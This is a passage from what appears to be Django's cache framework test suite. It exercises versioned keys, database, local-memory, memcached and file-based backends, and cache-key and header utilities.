self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertEqual(cache.get_or_set('null', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
def test_get_or_set_callable_returning_none(self):
self.assertIsNone(cache.get_or_set('mykey', lambda: None))
# Previous get_or_set() doesn't store None in the cache.
self.assertEqual(cache.get('mykey', 'default'), 'default')
def test_get_or_set_version(self):
msg = "get_or_set() missing 1 required positional argument: 'default'"
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super().setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super().tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_get_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2})
cache.set('expired', 'expired', 0.01)
with self.assertNumQueries(1):
self.assertEqual(cache.get_many(['a', 'b']), {'a': 1, 'b': 2})
time.sleep(0.02)
with self.assertNumQueries(2):
self.assertEqual(cache.get_many(['a', 'b', 'expired']), {'a': 1, 'b': 2})
def test_delete_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2, 'c': 3})
with self.assertNumQueries(1):
cache.delete_many(['a', 'b', 'c'])
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = io.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = io.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = io.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter:
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
databases = {'default', 'other'}
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable', database='default', verbosity=0)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable', database='other', verbosity=0)
class PicklingSideEffect:
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
self.locked = self.cache._lock.locked()
return {}
limit_locmem_entries = override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
OPTIONS={'MAX_ENTRIES': 9},
))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super().setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
@limit_locmem_entries
def test_lru_get(self):
"""get() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
@limit_locmem_entries
def test_lru_set(self):
"""set() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(3, 9):
cache.set(key, key, timeout=None)
cache.set(9, 9, timeout=None)
for key in range(3, 10):
self.assertEqual(cache.get(key), key)
for key in range(3):
self.assertIsNone(cache.get(key))
@limit_locmem_entries
def test_lru_incr(self):
"""incr() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
cache.incr(key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key + 1)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
with self.subTest(location=location):
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def test_invalid_key_characters(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
# when using the ascii protocol.
with self.assertRaises(Exception):
cache.set('key with spaces', 'value')
def test_invalid_key_length(self):
# memcached limits key length to 250
with self.assertRaises(Exception):
cache.set('a' * 251, 'value')
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Some clients (e.g. pylibmc) raise when the value is too large,
# while others (e.g. python-memcached) intentionally return True
# indicating success. This test is primarily checking that the key
# was deleted, so the return/exception behavior for the set()
# itself is not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._lib.Client, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
def test_set_many_returns_failing_keys(self):
def fail_set_multi(mapping, *args, **kwargs):
return mapping.keys()
with mock.patch('%s.Client.set_multi' % self.client_library_name, side_effect=fail_set_multi):
failing_keys = cache.set_many({'key': 'value'})
self.assertEqual(failing_keys, ['key'])
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
base_params = MemcachedCache_params
client_library_name = 'memcache'
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key in settings.CACHES:
with self.subTest(cache_key=cache_key):
self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'server_max_value_length': 9999},
))
def test_memcached_options(self):
self.assertEqual(cache._cache.server_max_value_length, 9999)
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
client_library_name = 'pylibmc'
# libmemcached manages its own connections.
should_disconnect_on_close = False
# By default, pylibmc/libmemcached don't verify keys client-side and so
# this test triggers a server-side bug that causes later tests to fail
# (#19914). The `verify_keys` behavior option could be set to True (which
# would avoid triggering the server-side bug), however this test would
# still fail due to https://github.com/lericson/pylibmc/issues/219.
@unittest.skip("triggers a memcached-server bug, causing subsequent tests to fail")
def test_invalid_key_characters(self):
pass
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super().setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super().tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
self.assertTrue(os.path.exists(self.dirname))
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
def test_get_does_not_ignore_non_filenotfound_exceptions(self):
with mock.patch('builtins.open', side_effect=IOError):
with self.assertRaises(IOError):
cache.get('foo')
def test_empty_cache_file_considered_expired(self):
cache_file = cache._key_to_file('foo')
with open(cache_file, 'wb') as fh:
fh.write(b'')
with open(cache_file, 'rb') as fh:
self.assertIs(cache._is_expired(fh), True)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""
Settings having Cache arguments with a TIMEOUT=None create Caches that will
set non-expiring keys.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined in
django.core.cache.backends.base.BaseCache.__init__().
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
host = 'www.example.com'
path = '/cache/test/'
factory = RequestFactory(HTTP_HOST=host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
